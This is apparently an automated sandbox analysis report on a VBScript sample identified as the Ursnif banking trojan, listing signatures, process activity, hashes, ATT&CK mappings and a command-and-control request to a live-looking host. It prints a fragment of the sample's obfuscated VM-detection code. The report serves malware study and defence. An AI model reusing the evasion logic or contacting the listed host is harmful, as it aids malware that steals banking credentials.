Loading ...

Play interactive tourEdit tour

Analysis Report WoXAp0Q0zaNl.vbs

Overview

General Information

Sample Name:WoXAp0Q0zaNl.vbs
Analysis ID:283989
MD5:baa0a7597d2ebb9199a1e679dc96ea41
SHA1:bf2593d95a4b948cc702be4863dd994744e68033
SHA256:23b57a9859e8c6d0f851ec43eef95689cd728e4b64087e2222f47158bf40bbb5

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
WScript reads language and country specific registry keys (likely country aware script)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 7044 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 456 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 7052 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\digram.itVirustotal: Detection: 23%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\digram.itReversingLabs: Detection: 16%
            Multi AV Scanner detection for submitted fileShow sources
            Source: WoXAp0Q0zaNl.vbsVirustotal: Detection: 21%Perma Link
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: global trafficHTTP traffic detected: GET /api1/YXIIEbjr/LKHsOdzDIb6srGqE_2F2Er6/HCbOtaiM62/3Ar3CmbW41bZrpoR_/2BGysJ7tJIut/_2BFAukfihC/tpgdEs38KtyYHo/kktDpMw4OLyq38u7ZBnvv/42Welbey1DQFDT5_/2BD_2F2IHF2O0r1/yrQwG6dWZ8DmHPk7oN/EbhuDrivI/J_2B_2BFq9IFGp8_2BI_/2FCylN_2BEo819KSTwa/0MXm2M1VxU28J3cJ4ol9MT/sZwPzVemSBoyC/1Lvtf_2B/yGj2SU2fE7V0Oth_2Foz_0A/_0DFm2ouNB/hfL_2Baahr1huA43q/Z1YUxW6qUxNZ/H_2B5MCMqWQ/nJi24tA8M_2Fov/zPX5bTYz9z/ohH HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x46bd4534,0x01d687be</date><accdate>0x46bd4534,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x46bd4534,0x01d687be</date><accdate>0x46bd4534,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x46c209ca,0x01d687be</date><accdate>0x46c209ca,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x46c209ca,0x01d687be</date><accdate>0x46c209ca,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x46c46c38,0x01d687be</date><accdate>0x46c46c38,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x46c46c38,0x01d687be</date><accdate>0x46c46c38,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Sep 2020 13:03:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: msapplication.xml.19.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.19.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.19.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.19.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.19.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.19.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.19.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.19.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\digram.it A5B0036E0B2C73D3A8F47ED153CAA974EC04A870E06FB5F144C584B58B54DEC9
            Source: WoXAp0Q0zaNl.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal96.troj.evad.winVBS@4/24@1/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: WoXAp0Q0zaNl.vbsVirustotal: Detection: 21%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: WoXAp0Q0zaNl.vbsStatic file information: File size 1177208 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: c:\Rise\75\idea\toward\94\Scale\Live\34\Best\77\25\All\Whose.pdb source: digram.it.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(702240904)) > 0 And Welles682 = 0) ThenExit Function' dutiful irredentist239 scopic Galbreath huckleberry example563 wastage Messiah clientele protozoan role merrymake Casanova alkaloid, circumpolar poesy derelict incapacity Chalmers tuple568 brindle syphilitic nightdress, 7557426 pietism hippodrome varnish Ackley libation chinquapin Daedalus might chiefdom eyeball Samson Chesterton vii buzzy bandwagon Calhoun Lyle formulate McKenzie intimater surpass anew upcome spinneret End IfSet PEpttService = GetObject("winmgmts:\\.\root\cimv2")Set GJkCFmZlItems = PEpttService.ExecQuery("Select * from Win32_ComputerSystem")For Each hgYKL In GJkCFmZlItems' giggle713 doctrinal exchange impunity552 fable Huston clung hatchet367 swallow pickle319 aberrate emigrate columnar behead gardenia extempore340 Cervantes taboo aluminate384 Riordan screw74 poke tenement glutamine oddball175 subservient25 citizenry rakish926 annular spiritual, Lazarus betroth230 nostalgic Seattle Argive sandwich childish wallow. acrobatic ha calamus gaur nighttime concordant thistledown circumcision erratum, interregnum bashful lay195 Vanderpoel apotheosis870 Loire. 1890016 airflow814, Lockhart rebel hegemony auxiliary echo412 joyride onward broil sheepherder deputation workload718 exfoliate Laurent Hans GhbaI = GhbaI + Int((hgYKL.TotalPhysicalMemory) / ((1048658 - 79.0) - (72 + (-(1 + 68.0)))))REM embodiment, Guinevere, Vishnu kneel81 macaque706. burglar debonair ambrose456 lax hydroxyl wholly scuffle. wraith beneath minuscule86 sandpaper bruit parent mound502, televise viscount taxi quaff Archibald whack cohere40. 2161742 conserve shirt891 Hippocratic arc tularemia leeway chase flipflop sailor Blaine Jolla mulligan serve Gibson89 Giovanni. 7282276 opal, 9667674 reb, 278783 pterodactyl. bronze phone984 Aztec phosphate concision oh flake hectic moreover797 despoil tawny degumming hundredfold Next' conciliate advent. 4668633 carnation898 wire, 9922102 quixotic, drive refrigerate371, intricacy Dooley stupor Giuliano open763 county exogenous punctuate ancient Furman stowage vernal478 redshank digress amethystine breakpoint hodgepodge neutral infallible Mycenae oaken amoebae autocratic Carmen quadrangular coypu Edmonds periphrastic inapplicable collaborate penmen Wagner congratulatory messy. 3091313 loot guitar943 If GhbaI < (((276 - 228.0) + (86 + 2760.0)) - 1864.0) Then' freshmen stagnant summit508 Hilbert tarpon tarantula tower252 sukiyaki dutiable Ella drill. 8689681 berry903 dictatorial antiquary dosimeter n949 claim. minima weave, corpuscular poisonous ecology stearic Stafford Fordham intellectual perspicuity telecommunicate310 Evans sapsucker. Wong roommate dexterity. Harlem wastewater Blum. 7341983 wakeup lore faithful invasion428 portrait78 vociferous floc184 tollhouse sourberry, Cretan964 ameliorate Ada. Elmira, primal freeload, beneficent oblate yaw ally Libya fiat daylight, 1604588 statuary candy216 orthodontist819 animadversion cocky stolid symp

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\digram.itJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\digram.itJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\woxap0q0zanl.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            WScript reads language and country specific registry keys (likely country aware script)Show sources
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\digram.itJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 7088Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.236288354.000001B818AB5000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: digram.it.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection1Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion4LSASS MemorySecurity Software Discovery231Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerVirtualization/Sandbox Evasion4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery124SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.